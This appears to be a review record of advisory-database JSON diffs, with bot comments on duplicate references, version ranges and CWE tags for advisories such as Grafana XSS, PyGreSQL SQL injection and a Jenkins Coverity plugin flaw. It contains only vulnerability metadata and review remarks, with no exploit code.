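Review bot: The same `1.12.0 ≤ v < 1.12.14` range now appears under both `zendframework/zendframework1` and the newly added `zendframework/zendframework` entry; that is only right if both Packagist packages actually publish 1.12.x tags, which the FriendsOfPHP YAML references added here should confirm — otherwise the duplicate entry never matches and just pads the record. Raising the lower bounds from `"0"` to `2.0.0`, `1.12.0` and `1.0.0` also silently drops every release older than those branches (ZF 1.11 and earlier, ZendXml pre-releases); those were never patched, so if they are considered affected the narrowing turns true positives into silence and a `details` sentence saying older branches are unpatched would be warranted. The new plain `http://www.securityfocus.com/bid/76177` reference duplicates the web.archive.org copy already listed, whose presence suggests the live host no longer serves it; I would drop the plain one.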
diff --git a/advisories/github-reviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json b/advisories/github-reviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json new file mode 100644 index 0000000000000..b409f2f96222e --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xr3x-62qw-vc4w/GHSA-xr3x-62qw-vc4w.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xr3x-62qw-vc4w", + "modified": "2024-02-01T21:47:24Z", + "published": "2022-05-24T17:24:21Z", + "aliases": [ + "CVE-2020-11110" + ], + "summary": "Grafana stored XSS", + "details": "Grafana through 6.7.1 allows stored XSS.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.7.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.7.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11110" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/23254" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/commit/fb114a75241aaef4c08581b42509c750738b768a" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200810-0002/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:47:24Z", + "nvd_published_at": "2020-07-27T13:15:00Z" + } +} \ No newline at end of file 
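Review bot: `details` says only `Grafana through 6.7.1 allows stored XSS`, which gives a reader no component, no privilege needed to plant the payload, and no victim action; the referenced PR #23254 and commit should be summarised into one sentence naming the sink (judging from the `PR:L/UI:R/S:C` vector, content an authenticated user stores and another user renders — confirm). The `https://github.com/grafana/grafana/blob/master/CHANGELOG.md` reference is an unpinned moving target; point it at the fix release, e.g. `https://github.com/grafana/grafana/blob/v6.7.2/CHANGELOG.md`. It is also worth checking that the `Go` ecosystem mapping `github.com/grafana/grafana` with a bare `6.7.2` resolves in the tooling that consumes this database, since Grafana does not appear to be published as a Go module at that path and major.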
diff --git a/advisories/github-reviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json b/advisories/github-reviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json new file mode 100644 index 0000000000000..d890e4f4d9a31 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-xv6x-43gq-4hfj/GHSA-xv6x-43gq-4hfj.json 
@@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xv6x-43gq-4hfj", + "modified": "2024-02-08T21:31:52Z", + "published": "2022-05-02T03:40:08Z", + "aliases": [ + "CVE-2009-2940" + ], + "summary": "PyGreSQL Might Be Vulnerable to Encoding-Based SQL Injection", + "details": "PyGreSQL 3.8 did not use PostgreSQL’s safe `string` and `bytea` functions in its own escaping functions. As a result, applications written to use PyGreSQL’s escaping functions are vulnerable to SQL injections when processing certain multi-byte character sequences. Because the safe functions require a database connection, to maintain backwards compatibility, `pg.escape_string()` and `pg.escape_bytea()` are still available, but applications will have to be adjusted to use the new `pyobj.escape_string()` and `pyobj.escape_bytea()` functions. For example, code containing:\n\n```python\nimport pg\nconnection = pg.connect(...)\nescaped = pg.escape_string(untrusted_input)\n```\nshould be adjusted to use:\n\n```python\nimport pg\nconnection = pg.connect(...)\nescaped = connection.escape_string(untrusted_input)\n```", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "PyGreSQL" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.8.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "PyGreSQL" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0" + }, + { + "fixed": "4.1" + } + ] + } + ], + "versions": [ + "4.0" + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2940" + }, + { + "type": "WEB", + "url": "https://github.com/PyGreSQL/PyGreSQL/commit/8e19320b130946eed6f043297e3e4e005a523612" + }, + { + "type": "WEB", + "url": "https://github.com/PyGreSQL/PyGreSQL/commit/f7237d773e6f4d5a7da3d99bb6bc5062bd07935e" + }, + { + "type": "PACKAGE", + "url": 
"https://github.com/PyGreSQL/PyGreSQL" + }, + { + "type": "WEB", + "url": "http://ubuntu.com/usn/usn-870-1" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2009/dsa-1911" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:31:52Z", + "nvd_published_at": "2009-10-22T16:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/06/GHSA-5ffw-gxpp-mxpf/GHSA-5ffw-gxpp-mxpf.json b/advisories/github-reviewed/2022/06/GHSA-5ffw-gxpp-mxpf/GHSA-5ffw-gxpp-mxpf.json index ee35eca3c83d8..8652b5b844939 100644 --- a/advisories/github-reviewed/2022/06/GHSA-5ffw-gxpp-mxpf/GHSA-5ffw-gxpp-mxpf.json +++ b/advisories/github-reviewed/2022/06/GHSA-5ffw-gxpp-mxpf/GHSA-5ffw-gxpp-mxpf.json @@ -71,6 +71,14 @@ "type": "PACKAGE", "url": "https://github.com/containerd/containerd" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/REOZCUAPCA7NFDWYBDYX6EYXWLHABKBO/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WSIGDBHAB3I75JBJNGWEPBTJPS2FOVHD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/REOZCUAPCA7NFDWYBDYX6EYXWLHABKBO/" @@ -79,6 +87,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WSIGDBHAB3I75JBJNGWEPBTJPS2FOVHD/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-31" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5162" diff --git a/advisories/github-reviewed/2022/06/GHSA-7m9h-v68w-pfw3/GHSA-7m9h-v68w-pfw3.json b/advisories/github-reviewed/2022/06/GHSA-7m9h-v68w-pfw3/GHSA-7m9h-v68w-pfw3.json index 93b72563b8b4d..b70ca034c58df 100644 
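Review bot: The migration advice in `details` is internally inconsistent — the prose names the replacements `pyobj.escape_string()` / `pyobj.escape_bytea()` while the code sample calls `connection.escape_string(...)`; use one name (the sample's `connection` is clearer) so readers know the method lives on the connection object. The text also presents connection-aware escaping as the fix, but a practitioner should be told that escaping is the fallback and that parameterised queries, where the driver supports them, avoid the multi-byte encoding problem entirely — one sentence to that effect would be a useful caveat (confirm which PyGreSQL versions support parameters before naming an API). Finally `severity` is an empty array while `database_specific.severity` is `"HIGH"`; add a vector or mark the rating as an estimate.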
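Review bot: The two added Fedora URLs differ from entries already in the list only by encoding `@` as `%40` (`package-announce%40lists.fedoraproject.org` versus the existing `package-announce@lists.fedoraproject.org`), so each announcement message is now listed twice and any consumer that keys references by URL will double-count them. Keep one spelling per message — the unencoded form already present — and add only the Gentoo `https://security.gentoo.org/glsa/202401-31` entry, which is genuinely new.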
--- a/advisories/github-reviewed/2022/06/GHSA-7m9h-v68w-pfw3/GHSA-7m9h-v68w-pfw3.json +++ b/advisories/github-reviewed/2022/06/GHSA-7m9h-v68w-pfw3/GHSA-7m9h-v68w-pfw3.json @@ -169,14 +169,6 @@ { "type": "WEB", "url": "https://www.neos.io/blog/xss-in-various-backend-modules.html" - }, - { - "type": "WEB", - "url": "http://cms.com" - }, - { - "type": "WEB", - "url": "http://neos.com" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json b/advisories/github-reviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json new file mode 100644 index 0000000000000..7a48c85793215 --- /dev/null +++ b/advisories/github-reviewed/2022/06/GHSA-9394-xfq9-6qrp/GHSA-9394-xfq9-6qrp.json 
@@ -0,0 +1,99 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9394-xfq9-6qrp", + "modified": "2024-02-02T20:16:57Z", + "published": "2022-06-07T00:00:33Z", + "aliases": [ + "CVE-2022-28224" + ], + "summary": "Calico vulnerable to pod route hijacking", + "details": "Clusters using Calico (version 3.22.1 and below), Calico Enterprise (version 3.12.0 and below), may be vulnerable to route hijacking with the floating IP feature. Due to insufficient validation, a privileged attacker may be able to set a floating IP annotation to a pod even if the feature is not enabled. This may allow the attacker to intercept and reroute traffic to their compromised pod.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/projectcalico/calico" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.22.0" + }, + { + "fixed": "3.22.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/projectcalico/calico" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.21.0" + }, + { + "fixed": "3.21.5" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/projectcalico/calico" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.20.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28224" + }, + { + "type": "PACKAGE", + "url": "https://github.com/projectcalico/calico" + }, + { + "type": "WEB", + "url": "https://www.tigera.io/security-bulletins-tta-2022-001/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T20:16:57Z", + "nvd_published_at": "2022-06-06T18:15:00Z" + } +} \ No newline at end of file 
diff --git a/advisories/github-reviewed/2022/06/GHSA-pg8v-g4xq-hww9/GHSA-pg8v-g4xq-hww9.json b/advisories/github-reviewed/2022/06/GHSA-pg8v-g4xq-hww9/GHSA-pg8v-g4xq-hww9.json index a4585a1035c6b..801ddcbf6a4e4 100644 --- a/advisories/github-reviewed/2022/06/GHSA-pg8v-g4xq-hww9/GHSA-pg8v-g4xq-hww9.json +++ b/advisories/github-reviewed/2022/06/GHSA-pg8v-g4xq-hww9/GHSA-pg8v-g4xq-hww9.json @@ -64,6 +64,14 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00012.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AGRLWBEB3S5AU3D4TTROIS7O6QPHDTRH/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NHDACMCLWE32BZZTSNWQPIFUAD5I6Q47/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AGRLWBEB3S5AU3D4TTROIS7O6QPHDTRH/" diff --git a/advisories/github-reviewed/2022/09/GHSA-6x28-7h8c-chx4/GHSA-6x28-7h8c-chx4.json b/advisories/github-reviewed/2022/09/GHSA-6x28-7h8c-chx4/GHSA-6x28-7h8c-chx4.json index e01304e14fc0d..e234587824f41 100644 --- a/advisories/github-reviewed/2022/09/GHSA-6x28-7h8c-chx4/GHSA-6x28-7h8c-chx4.json +++ b/advisories/github-reviewed/2022/09/GHSA-6x28-7h8c-chx4/GHSA-6x28-7h8c-chx4.json @@ -67,6 +67,10 @@ { "type": "WEB", "url": "https://github.com/dompdf/dompdf/releases/tag/v2.0.1" + }, + { + "type": "WEB", + "url": "https://tantosec.com/blog/cve-2022-41343/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/09/GHSA-c429-5p7v-vgjp/GHSA-c429-5p7v-vgjp.json b/advisories/github-reviewed/2022/09/GHSA-c429-5p7v-vgjp/GHSA-c429-5p7v-vgjp.json index ae4a836e01f1c..cafb59536d4c2 100644 --- a/advisories/github-reviewed/2022/09/GHSA-c429-5p7v-vgjp/GHSA-c429-5p7v-vgjp.json +++ b/advisories/github-reviewed/2022/09/GHSA-c429-5p7v-vgjp/GHSA-c429-5p7v-vgjp.json 
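Review bot: The two references added in the `@@ -64,6 +64,14 @@` hunk of GHSA-pg8v-g4xq-hww9 duplicate the entries that already follow them, differing only in `%40` versus a literal `@` in the `package-announce@lists.fedoraproject.org` path segment. Consumers that de-duplicate references by exact string will list the same Fedora announcement twice; keep one spelling (the existing `@` form matches the rest of the file) and drop the other pair. The same duplicate pair is added to GHSA-5ffw-gxpp-mxpf earlier in this diff and should be handled the same way.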
@@ -62,6 +62,30 @@ ] } ] + }, + { + "package": { + "ecosystem": "npm", + "name": "hoek" + }, + "ecosystem_specific": { + "affected_functions": [ + "(hoek).clone" + ] + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "6.1.3" + } + ] + } + ] } ], "references": [ diff --git a/advisories/github-reviewed/2022/10/GHSA-4f63-89w9-3jjv/GHSA-4f63-89w9-3jjv.json b/advisories/github-reviewed/2022/10/GHSA-4f63-89w9-3jjv/GHSA-4f63-89w9-3jjv.json index 26caad6919941..47cc97c5f269a 100644 --- a/advisories/github-reviewed/2022/10/GHSA-4f63-89w9-3jjv/GHSA-4f63-89w9-3jjv.json +++ b/advisories/github-reviewed/2022/10/GHSA-4f63-89w9-3jjv/GHSA-4f63-89w9-3jjv.json @@ -56,6 +56,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2022-0059.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221028-0014/" diff --git a/advisories/github-reviewed/2022/10/GHSA-5hw4-m7f3-hhx8/GHSA-5hw4-m7f3-hhx8.json b/advisories/github-reviewed/2022/10/GHSA-5hw4-m7f3-hhx8/GHSA-5hw4-m7f3-hhx8.json index 5345103784bc7..fd7442d468a2f 100644 --- a/advisories/github-reviewed/2022/10/GHSA-5hw4-m7f3-hhx8/GHSA-5hw4-m7f3-hhx8.json +++ b/advisories/github-reviewed/2022/10/GHSA-5hw4-m7f3-hhx8/GHSA-5hw4-m7f3-hhx8.json 
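Review bot: The new `hoek` entry closes its range with `"last_affected": "6.1.3"` and no `fixed` event, which tells consumers that no patched version of this package exists rather than that 6.1.3 is merely the last version examined. If that is intentional because the unscoped `hoek` package is no longer maintained, the advisory text should say so (the details field lies outside this hunk); otherwise the event should be `{ "fixed": "<first patched version>" }` with the real version filled in. The `affected_functions` value `(hoek).clone` should also be checked against the function named for the existing entry above the hunk so both packages are described the same way.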
@@ -33,6 +33,63 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "fooman/tcpdf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.2.22" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "la-haute-societe/tcpdf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.2.22" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "spoonity/tcpdf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.2.22" + } + ] + } + ] } ], "references": [ @@ -52,6 +109,22 @@ "type": "WEB", "url": "https://contao.org/en/news/security-vulnerability-cve-2018-17057.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/fooman/tcpdf/CVE-2018-17057.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/la-haute-societe/tcpdf/CVE-2018-17057.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/spoonity/tcpdf/CVE-2018-17057.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/tecnickcom/tcpdf/CVE-2018-17057.yaml" + }, { "type": "WEB", "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/wallabag/tcpdf/CVE-2018-17057.yaml" diff --git a/advisories/github-reviewed/2022/12/GHSA-2qjp-425j-52j9/GHSA-2qjp-425j-52j9.json b/advisories/github-reviewed/2022/12/GHSA-2qjp-425j-52j9/GHSA-2qjp-425j-52j9.json index af61eb824d195..f53cb16c11243 100644 --- a/advisories/github-reviewed/2022/12/GHSA-2qjp-425j-52j9/GHSA-2qjp-425j-52j9.json +++ b/advisories/github-reviewed/2022/12/GHSA-2qjp-425j-52j9/GHSA-2qjp-425j-52j9.json 
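Review bot: The `@@ -52,6 +109,22 @@` hunk adds a FriendsOfPHP reference for `tecnickcom/tcpdf`, but the `@@ -33,6 +33,63 @@` hunk adds affected entries only for `fooman/tcpdf`, `la-haute-societe/tcpdf` and `spoonity/tcpdf`. Unless `tecnickcom/tcpdf` is already one of the entries above the hunk, that reference has no matching range and scanners would miss the upstream package; if it is there, nothing needs to change. All three new forks carry the same `"fixed": "6.2.22"`; confirm that each fork actually published that version with the fix rather than inheriting the number from upstream, since a `fixed` event that was never released makes the range unreachable.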
@@ -82,6 +82,10 @@ { "type": "WEB", "url": "https://github.com/containerd/containerd/releases/tag/v1.6.12" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-31" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/12/GHSA-4crw-w8pw-2hmf/GHSA-4crw-w8pw-2hmf.json b/advisories/github-reviewed/2022/12/GHSA-4crw-w8pw-2hmf/GHSA-4crw-w8pw-2hmf.json index c3576d54df5ad..b50fcfa4d86d8 100644 --- a/advisories/github-reviewed/2022/12/GHSA-4crw-w8pw-2hmf/GHSA-4crw-w8pw-2hmf.json +++ b/advisories/github-reviewed/2022/12/GHSA-4crw-w8pw-2hmf/GHSA-4crw-w8pw-2hmf.json @@ -28,7 +28,7 @@ "introduced": "0" }, { - "last_affected": "4.3.1" + "fixed": "4.5.0" } ] } @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/containers/podman/pull/16315" }, + { + "type": "WEB", + "url": "https://github.com/containers/podman/commit/c8eeab21cf0a4f670be0cd399dd06fd5d4e06dfe" + }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2144983" diff --git a/advisories/github-reviewed/2023/01/GHSA-hq7p-j377-6v63/GHSA-hq7p-j377-6v63.json b/advisories/github-reviewed/2023/01/GHSA-hq7p-j377-6v63/GHSA-hq7p-j377-6v63.json index 975aff7592e77..984e4907fd163 100644 --- a/advisories/github-reviewed/2023/01/GHSA-hq7p-j377-6v63/GHSA-hq7p-j377-6v63.json +++ b/advisories/github-reviewed/2023/01/GHSA-hq7p-j377-6v63/GHSA-hq7p-j377-6v63.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hq7p-j377-6v63", - "modified": "2023-05-16T15:47:47Z", + "modified": "2024-02-02T16:49:27Z", "published": "2023-01-18T18:20:19Z", "aliases": [ "CVE-2023-22794" @@ -98,6 +98,10 @@ "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activerecord/CVE-2023-22794.yml" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0008/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5372" 
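Review bot: Replacing `"last_affected": "4.3.1"` with `"fixed": "4.5.0"` in GHSA-4crw-w8pw-2hmf silently widens the affected set to every 4.4.x release, which is correct only if the newly referenced commit `c8eeab21cf0a4f670be0cd399dd06fd5d4e06dfe` first shipped in 4.5.0; the advisory should state which release carried it. None of this file's hunks touches the `modified` timestamp, unlike GHSA-hq7p-j377-6v63 in the same commit, so consumers syncing on `modified` will not pick up the changed range. The same applies to the package renames in GHSA-564r-hj7v-mcr5 and GHSA-wxqc-pxw9-g2p8 later in this diff, whose hunks likewise never reach the top of the file. If `modified` is regenerated by tooling on publish, this can be ignored.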
diff --git a/advisories/github-reviewed/2023/01/GHSA-p84v-45xj-wwqj/GHSA-p84v-45xj-wwqj.json b/advisories/github-reviewed/2023/01/GHSA-p84v-45xj-wwqj/GHSA-p84v-45xj-wwqj.json index 64417a3aaf35e..2ec37c1d77de9 100644 --- a/advisories/github-reviewed/2023/01/GHSA-p84v-45xj-wwqj/GHSA-p84v-45xj-wwqj.json +++ b/advisories/github-reviewed/2023/01/GHSA-p84v-45xj-wwqj/GHSA-p84v-45xj-wwqj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p84v-45xj-wwqj", - "modified": "2023-02-10T22:06:15Z", + "modified": "2024-02-02T16:50:44Z", "published": "2023-01-18T18:23:34Z", "aliases": [ "CVE-2023-22792" @@ -79,6 +79,10 @@ "type": "WEB", "url": "https://discuss.rubyonrails.org/t/cve-2023-22792-possible-redos-based-dos-vulnerability-in-action-dispatch/82115" }, + { + "type": "PACKAGE", + "url": "https://github.com/rails/rails" + }, { "type": "WEB", "url": "https://github.com/rails/rails/releases/tag/v7.0.4.1" @@ -90,11 +94,20 @@ { "type": "WEB", "url": "https://rubyonrails.org/2023/1/17/Rails-Versions-6-0-6-1-6-1-7-1-7-0-4-1-have-been-released" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240202-0007/" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2023/dsa-5372" } ], "database_specific": { "cwe_ids": [ - "CWE-1333" + "CWE-1333", + "CWE-400" ], "severity": "LOW", "github_reviewed": true, diff --git a/advisories/github-reviewed/2023/02/GHSA-29xx-hcv2-c4cp/GHSA-29xx-hcv2-c4cp.json b/advisories/github-reviewed/2023/02/GHSA-29xx-hcv2-c4cp/GHSA-29xx-hcv2-c4cp.json index a3b12d188fa38..5e7a68b5b3a59 100644 --- a/advisories/github-reviewed/2023/02/GHSA-29xx-hcv2-c4cp/GHSA-29xx-hcv2-c4cp.json +++ b/advisories/github-reviewed/2023/02/GHSA-29xx-hcv2-c4cp/GHSA-29xx-hcv2-c4cp.json 
@@ -48,6 +48,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0011.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" diff --git a/advisories/github-reviewed/2023/02/GHSA-3vrc-rrpw-r5pw/GHSA-3vrc-rrpw-r5pw.json b/advisories/github-reviewed/2023/02/GHSA-3vrc-rrpw-r5pw/GHSA-3vrc-rrpw-r5pw.json index 2411ad953b8b5..e81289b231400 100644 --- a/advisories/github-reviewed/2023/02/GHSA-3vrc-rrpw-r5pw/GHSA-3vrc-rrpw-r5pw.json +++ b/advisories/github-reviewed/2023/02/GHSA-3vrc-rrpw-r5pw/GHSA-3vrc-rrpw-r5pw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3vrc-rrpw-r5pw", - "modified": "2023-03-01T20:46:06Z", + "modified": "2024-02-08T12:30:48Z", "published": "2023-02-19T18:30:21Z", "aliases": [ "CVE-2014-125087" @@ -56,6 +56,10 @@ "type": "WEB", "url": "https://github.com/jmurty/java-xmlbuilder/releases/tag/v1.2" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240208-0009/" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.221480" diff --git a/advisories/github-reviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json b/advisories/github-reviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json new file mode 100644 index 0000000000000..9aab29902462f --- /dev/null +++ b/advisories/github-reviewed/2023/02/GHSA-c3v2-5388-v8pw/GHSA-c3v2-5388-v8pw.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3v2-5388-v8pw", + "modified": "2024-01-30T23:16:38Z", + "published": "2023-02-15T21:30:30Z", + "aliases": [ + "CVE-2023-23848" + ], + "summary": "CSRF vulnerability in Jenkins Coverity Plugin allow capturing credentials", + "details": "Missing permission checks in Synopsys Jenkins Coverity Plugin 3.0.2 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:synopsys-coverity" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.0.2" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23848" + }, + { + "type": "WEB", + "url": "https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-Multiple-CVEs-affecting-Coverity-Jenkins-Plugin" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2793%20(2)" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:16:38Z", + "nvd_published_at": "2023-02-15T19:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/02/GHSA-p52g-cm5j-mjv4/GHSA-p52g-cm5j-mjv4.json b/advisories/github-reviewed/2023/02/GHSA-p52g-cm5j-mjv4/GHSA-p52g-cm5j-mjv4.json index 80143bd234f12..730b3de8bad9a 100644 --- a/advisories/github-reviewed/2023/02/GHSA-p52g-cm5j-mjv4/GHSA-p52g-cm5j-mjv4.json 
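Review bot: The `summary` of GHSA-c3v2-5388-v8pw says "CSRF vulnerability", but its `details` describe missing permission checks, and the CSRF issue is the separate record GHSA-px6v-6jhf-j46r added later in this diff with `CWE-352`. Retitle this one to match its details, e.g. `"summary": "Missing permission checks in Jenkins Coverity Plugin allow capturing credentials"`. `CWE-276` (incorrect default permissions) also looks like the wrong tag for a missing permission check; the GHSA-7gqc-q9mc-6348 record in this same commit tags the same class of Jenkins bug as `CWE-862`. Both Coverity records cite the identical anchor `#SECURITY-2793%20(2)`; since the `(2)` suffix indicates a numbered sub-entry, verify that this record should not point at the other one.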
+++ b/advisories/github-reviewed/2023/02/GHSA-p52g-cm5j-mjv4/GHSA-p52g-cm5j-mjv4.json @@ -63,6 +63,10 @@ "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-08" + }, { "type": "WEB", "url": "https://www.openssl.org/news/secadv/20230207.txt" @@ -70,7 +74,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-203" ], "severity": "MODERATE", "github_reviewed": true, diff --git a/advisories/github-reviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json b/advisories/github-reviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json new file mode 100644 index 0000000000000..201fda54616fa --- /dev/null +++ b/advisories/github-reviewed/2023/02/GHSA-px6v-6jhf-j46r/GHSA-px6v-6jhf-j46r.json 
